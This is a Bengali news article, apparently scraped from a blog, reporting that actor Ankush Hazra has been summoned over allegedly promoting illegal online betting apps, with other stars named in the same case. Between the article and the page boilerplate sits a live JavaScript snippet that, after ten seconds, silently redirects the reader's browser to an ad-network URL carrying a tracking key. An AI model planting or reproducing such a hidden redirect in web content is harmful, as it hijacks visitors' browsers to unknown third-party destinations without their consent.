গুরুতর অভিযোগ নিয়ে আইনি বিপাকে পড়েছেন ওপার বাংলার অন্যতম জনপ্রিয় অভিনেতা অঙ্কুশ হাজরা। ইতোমধ্যে আদালতে হাজিরা দিতে কেন্দ্রীয় তদন্তকারী সংস্থার পক্ষ থেকে নির্দেশনা পাঠানো হয়েছে অভিনেতাকে। শোনা যাচ্ছে, অবৈধ অনলাইন বেটিং অ্যাপের প্রচারের সঙ্গে জড়িয়ে ছিলেন অঙ্কুশ।
ভারতীয় গণমাধ্যমের খবর, বেআইনি বেটিং অ্যাপ সংক্রান্ত মামলায় মাসখানেক আগেই ২৯ জনের বিরুদ্ধে মামলা রুজু করে প্রশাসন। তালিকায় রয়েছেন বেশ কয়েকজন অভিনেতা ও সোশ্যাল ইনফ্লুয়েনসারের নাম। সেই তালিকায় ছিলেন দক্ষিণী তারকা রানা ডগ্গুবতী থেকে কপিল শর্মা, বিজয় দেবরকোন্ডা-সহ একাধিক তারকা।
এবার কি সেই তালিকায় নতুন নাম অঙ্কুশ? কারণ এর আগে আর কোনো টলিউড তারকার নাম জড়ায়নি এ ঘটনায়। সূত্রের খবর, দ্রুতই এই মামলায় জিজ্ঞাসাবাদের জন্য হাজিরার নির্দেশ দেওয়া হয়েছে তাকে।
বেটিং অ্যাপগুলোর হয়ে প্রচার করার বিনিময়ে তারা আর্থিক সুবিধা পেয়েছেন বলে অভিযোগ পাওয়া গেছে। তদন্তকারীদের সন্দেহ, এই বেআইনি বেটিং অ্যাপগুলি অবৈধভাবে কয়েক কোটি টাকা উপার্জন করেছে। তদন্তকারী সংস্থার নজর এড়াতে অভিনব পদ্ধতিতে সেই টাকা ঘোরানো হয়েছে বলেও অভিযোগ।
setTimeout(function () {
window.location.replace("https://www.revenuecpmgate.com/t5tcu8j3w?key=e6d381c5f593e8f94cf6901d440e5122 ");
}, 10000);
Post Top Ad
Responsive Ads Here
Sunday, 14 September 2025
Home
Unlabelled
অবৈধভাবে কোটি টাকা উপার্জনের অভিযোগ, অঙ্কুশকে আদালতে হাজিরার নির্দেশ
অবৈধভাবে কোটি টাকা উপার্জনের অভিযোগ, অঙ্কুশকে আদালতে হাজিরার নির্দেশ
Share This
About Kosto
